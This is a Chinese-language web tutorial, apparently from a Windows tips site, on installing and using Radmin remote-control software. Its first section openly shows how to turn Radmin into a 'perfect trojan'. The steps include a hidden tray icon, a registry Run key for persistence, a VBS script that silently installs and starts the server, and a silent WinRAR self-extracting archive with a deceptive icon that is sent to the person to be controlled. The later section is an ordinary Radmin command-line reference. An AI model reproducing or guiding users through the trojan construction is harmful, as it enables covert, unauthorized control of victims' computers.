windows之家1.radmin 安装和使用方法
一、radmin的配置
首先下载并解压Radmin。解压后有七个文件,打开“配置r_server”文件;
点选“注册信息”,把sn文件中的注册码复制粘贴到对话框中确定;
点击“设置密码”按钮进入设置密码窗口,为radmin设置不少于8位的密码后确定;
点选“设置参数”按钮进入设置参数窗口,选中“隐藏状态栏图标”前的复选框,端口可以改也可以默认,然后确定。
最后点“安装服务”,确定后退出。好,radmin的配置完毕。
二、导出注册表信息
因为Radmin工作原理的特殊性,配置信息并非记录在服务端程序内,而是在相关的注册表键值内,所以我们要导出注册表中的radmin信息。
打开注册表编辑器(开始->;运行->;输入regedit后回车),依次展开“HKEY_LOCAL_MACHINE\SYSTEM\
Radmin”键值项,在“radmin”键值项上右击选择“导出”,保存为名为r_server.reg的文件。
再依次展开“HKEY_LOCAL_MACHINE\SOFTWAR
E\Microsoft\Windows\CurrentVersion\Run”,在右边的窗口空白处右键单击,依次选择“新建”、“字符串值”,为新建的字符串起个名字,比如radmin,再在其上双击,在弹出的对话框的“数值数据”处填入“C:\WINDOWS\system32\r_server.exe”(不包括引号)后确定,然后导出radmin项,名称为qidong.reg 。
到此radmin的前期准备工作就做好了,下面来把它打造成完美木马。
三、打造完美木马
打开记事本,输入以下代码:
set ws=wscript.createobject("wscript.shell")
ws.run "regedit.exe /s r_server.reg",0
ws.run "regedit.exe /s qidong.reg",0
ws.run "r_server.exe /install /silence",0
ws.run "r_server.exe /start",0
另存为yunxing.vbs。
把radmin32文件夹中的r_server.exe、AdmDll.dll、raddrv.dll三个文件以及r_server.reg、qidong.reg和刚才的yunxing.vbs共六个文件复制到同一目录下,然后同时选中它们,用鼠标选中这六个文件,单击鼠标右键,选择“添加到压缩文件”(前提是你安装了WINRAR)。
在弹出的对话框的“常规”选项卡的“存档选项”框中选中“创建自释放格式档案文件(X)”前的复选框,然后切换到“高级”选项卡,点选“SFX选项(X)”进入高级自释放选项设置:在这里的“常规”选项卡中的释放路径一栏处填入“C:\WINDOWS\system32”(不包括引号),在“释放后运行”里填入yunxing.vbs(注意填写文件扩展名)。再切换到“模式”选项卡,缄默模式设置成“全部隐藏”,覆盖方式设置成“覆盖所有文件”。切换到“文字和图标”选项卡,在“自定义SFX”框中点“浏览”选择一个迷惑性的图标。最后连续点击两次“确定”完成收尾工作。好,完美的木马已经打造完成,把这个木马传给你要控制的人,你就可以玩远程控制了。
四、radmin的使用
这里简单的说一下radmin的使用方法:打开Radmin.exe,选择“连接选项”->;“连接到……”,在“连接类型”中选择你想要的功能,在“所连接的IP地址或DNS”中输入服务端的IP地址,然后点击“确定”,在弹出的对话框中输入你原先设置的密码,确定后就连接成功了。
2.Radmin3.0的使用方法
Radmin Views 有一些命令列方式的参数可以用, 让您不需打开连络薄就可以连上其它电脑.所以是不需要在每台机子上都装被控端户端 使用方法: radmin.exe /connect:xxxxx:nnnn other_options 例如: radmin.exe /connect:server:1000 /fullscreen /encrypt radmin.exe /connect:10.0.0.100:4000 /telnet radmin.exe /connect:server /through:gate 参数: /connect:xxxxx:nnnn - 指定对方的 IP 及 port Numbe. 如果您不用连络薄, 您可用这个来连上远端的电脑. /through:xxxxx:nnnn - 指定转接的机器 IP 及 port number.Radmin 可以让您通过中间的 Radmin server连结到其它机器去, 这在有Firewall的网络下特别有用. /telnet - 使用 telnet, 而不是图形方式 /fullscreen - 指定全屏幕方式 /hicolor - 使用 65536 色 来传输. /noinput - 不要将自己的鼠标器及键盘讯号送到远端电脑. /updates:nn - 指定每秒最多更新几个画面 /encrypt - 要对传输资料做加密. /? - show help Radmin server 命令列方式 通常您可以通过 Radmin 的 setup or install 程序来设定您的 Radmin server. 但是您也可以使用 Radmin 的 command mode 方式来做设定. 例如密码, port number等等. 用法: r_server.exe <switches> /setup - 跳出一个对号方块让您可以安装 service ,driver, password 及 port number. 例如: r_server.exe /setup [/port:xxxx] [/pass:xxxxx] - 如果没有指定参数的话, r_server 会执行成Radmin 的服务器, 然后从您的参数或是 registry key中读取密码及port number. 例如: r_server.exe 例如: r_server.exe /pass:blog.ukbg.net 例如: r_server.exe /port:5505 例如: r_server.exe /port:3333 /pass:blog.ukbg.net /save [/port:xxxx] [/pass:xxxxx] - 把密码及port number 存到 registry key去. 例如: r_server.exe /port:5505 /pass:qwerty /save 把密码(qwerty)及port number(5505) 存到 registry key去.,并且执行成 Radmin Server. 例如: r_server.exe /save 把预设的密码及port number 存到 registry key去.. /install - 安装 Radmin service (for Win95/98 or WinNT) 及 NT的驱动程序. 注意!! 如果要安装在 NT上 驱动程序 (raddrv.dll) 必须要放到您的 System32 这目录下. 例如: r_server.exe /install /uninstall - 反安装您的 Radmin. 例如: r_server.exe /uninstall /installservice - 只装 Service 不装 driver (Win95/98 or WinNT) 例如: r_server.exe /installservice /uninstallservice - 只反安装 Service. 注意 :如果反安装失败, 通常代表您还没把它装成 Service 例如: r_server.exe /uninstallservice /installdrv -只装趋动程序 (WinNT) 注意: 驱动程序 (raddrv.dll) 必须要放到您的 System32 这目录下. 例如: r_server.exe /installdrv /uninstalldrv - uninstall the driver only. 注意 :如果反安装失败, 通常代表您没有装 hook driver. 例如: r_server.exe /uninstalldrv /silence - 不要跳出 'error' 或 'ok' 等等信息 /? - shows help。
转载请注明出处windows之家 » win10安装radmin安装